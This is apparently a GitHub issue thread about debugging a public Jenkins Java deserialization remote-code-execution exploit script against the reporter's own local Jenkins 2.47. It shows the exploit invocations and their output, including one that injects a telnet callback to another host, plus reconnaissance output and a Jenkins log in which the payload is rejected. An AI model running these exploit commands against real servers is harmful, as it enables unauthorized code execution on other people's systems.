python error with exploit setup
thesrinivas opened this issue · 12 comments
I see this err when trying to setup an env for this exploit. This is on a Ubuntu 14.04 with nginx. Please let me know if I'm missing something here.
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:80 w
[*] Target IP: localhost
[*] Target PORT: 80
[*] Retrieving the Jenkins CLI port
Traceback (most recent call last):
File "jenkins_cli_rmi_rce.py", line 62, in <module>
cli_port = int(r.headers['X-Jenkins-CLI-Port'])
File "/usr/local/lib/python2.7/dist-packages/requests/structures.py", line 54, in __getitem__
return self._store[key.lower()][1]
KeyError: 'x-jenkins-cli-port'Hi,
Seems like the script is unable to retrieve the Jenkins CLI port from the HTTP headers.
What version of Jenkins are you running this against? Also can you paste the output of
curl -v http://localhost:80
Thanks
The output below shows Jenkins - 2.47.
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# curl -x '' -v http://localhost:8080
- Rebuilt URL to: http://localhost:8080/
- Hostname was NOT found in DNS cache
- Trying ::1...
- Connected to localhost (::1) port 8080 (#0)
GET / HTTP/1.1
User-Agent: curl/7.35.0
Host: localhost:8080
Accept: /
< HTTP/1.1 403 Forbidden
< Date: Thu, 26 Jan 2017 06:51:05 GMT
< X-Content-Type-Options: nosniff
< Set-Cookie: JSESSIONID.b1a2c03f=ymdnbb154xig25443mynliqn;Path=/;HttpOnly
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< Content-Type: text/html;charset=UTF-8
< X-Hudson: 1.395
< X-Jenkins: 2.47
< X-Jenkins-Session: a057be57
< X-You-Are-Authenticated-As: anonymous
< X-You-Are-In-Group-Disabled: JENKINS-39402: use -Dhudson.security.AccessDeniedException2.REPORT_GROUP_HEADERS=true or use /whoAmI to diagnose
< X-Required-Permission: hudson.model.Hudson.Read
< X-Permission-Implied-By: hudson.security.Permission.GenericRead
< X-Permission-Implied-By: hudson.model.Hudson.Administer
< Content-Length: 793
- Server Jetty(9.2.z-SNAPSHOT) is not blacklisted
< Server: Jetty(9.2.z-SNAPSHOT)
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# curl -x '' -v http://localhost:80
- Rebuilt URL to: http://localhost:80/
- Hostname was NOT found in DNS cache
- Trying ::1...
- Connected to localhost (::1) port 80 (#0)
GET / HTTP/1.1
User-Agent: curl/7.35.0
Host: localhost
Accept: /
< HTTP/1.1 200 OK
- Server nginx/1.4.6 (Ubuntu) is not blacklisted
< Server: nginx/1.4.6 (Ubuntu)
< Date: Fri, 27 Jan 2017 01:35:24 GMT
< Content-Type: text/html
< Content-Length: 612
< Last-Modified: Tue, 04 Mar 2014 11:46:45 GMT
< Connection: keep-alive
< ETag: "5315bd25-264"
< Accept-Ranges: bytes
<
Welcome to nginx!
If you see this page, the nginx web server is successfully installed and working. Further configuration is required.
For online documentation and support please refer to
nginx.org.
Commercial support is available at
nginx.com.
Thank you for using nginx.
* Connection #0 to host localhost left intact@thesrinivas seems like your Jenkins install isn't returning the X-Jenkins-CLI-Port HTTP header (which is required for the exploit to work). Can you do a full nmap scan of the target host to check if the port is open?
Turned off all security setting on Jenkins. Here's the nmap scan. What is the Jenkins CLI port that needs to be open?
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# nmap -sT localhost
Starting Nmap 6.40 ( http://nmap.org ) at 2017-01-26 17:52 PST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00029s latency).
Other addresses for localhost (not scanned): 127.0.0.1
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 0.06 seconds
Works now. What is the recommended Jenkins security settings for this exploit to work?
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:8080 w
[] Target IP: localhost
[] Target PORT: 8080
[] Retrieving the Jenkins CLI port
[] Connecting to Jenkins CLI on localhost:38539
[] Sending headers
[] Received "Welcome
"
[*] Received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
[+] Sent payload
All exploits were tested against Jenkins installations with default settings
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:8080 w
[] Target IP: localhost
[] Target PORT: 8080
[] Retrieving the Jenkins CLI port
[] Connecting to Jenkins CLI on localhost:38539
[] Sending headers
[] Received "Welcome
"
[*] Received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
[+] Sent payload
Can you confirm if this test result shows the exploit working? The test result above doesnt show the command 'w' output.
It's a blind RCE, you won't be able to get the command output. Try running tcpdump and pinging your machine to verify the exploit is working.
jenkins log file has the following:
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:8080 w
[] Target IP: localhost
[] Target PORT: 8080
[] Retrieving the Jenkins CLI port
[] Connecting to Jenkins CLI on localhost:38539
[] Sending headers
Jan 26, 2017 6:30:47 PM hudson.TcpSlaveAgentListener$ConnectionHandler run
INFO: Accepted connection #11 from /127.0.0.1:41468
[] Received "Welcome
"
[*] Received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
Jan 26, 2017 6:30:47 PM hudson.init.impl.InstallUncaughtExceptionHandler$DefaultUncaughtExceptionHandler uncaughtException
SEVERE: A thread (TCP agent connection handler #11 with /127.0.0.1:41468/80) died unexpectedly due to an uncaught exception, this may leave your Jenkins in a bad way and is usually indicative of a bug in the code.
java.lang.SecurityException: Rejected: sun.reflect.annotation.AnnotationInvocationHandler
at hudson.remoting.Capability$1.resolveClass(Capability.java:137)
at java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1817)
at java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1711)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1982)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1533)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:420)
at hudson.remoting.Capability.read(Capability.java:140)
at hudson.remoting.ChannelBuilder.negotiate(ChannelBuilder.java:391)
at hudson.remoting.ChannelBuilder.build(ChannelBuilder.java:310)
at hudson.cli.CliProtocol$Handler.runCli(CliProtocol.java:95)
at hudson.cli.CliProtocol$Handler.run(CliProtocol.java:82)
at hudson.cli.CliProtocol.handle(CliProtocol.java:58)
at hudson.TcpSlaveAgentListener$ConnectionHandler.run(TcpSlaveAgentListener.java:230)
[+] Sent payload
Dont think the exploit is working on my setup but I may be missing something obvious.
root@appserver:~/cve-2016-0792/java_deserialization_exploits/Jenkins# python jenkins_cli_rmi_rce.py localhost:8080 'telnet 10.0.2.15 8081'
[] Target IP: localhost
[] Target PORT: 8080
[] Retrieving the Jenkins CLI port
[] Connecting to Jenkins CLI on localhost:38539
[] Sending headers
Jan 26, 2017 6:47:48 PM hudson.TcpSlaveAgentListener$ConnectionHandler run
INFO: Accepted connection #15 from /127.0.0.1:41626
[] Received "Welcome
"
[*] Received "<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4="
Nothing on tcpdump
root@appserver:~# tcpdump port 8081 -i any
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes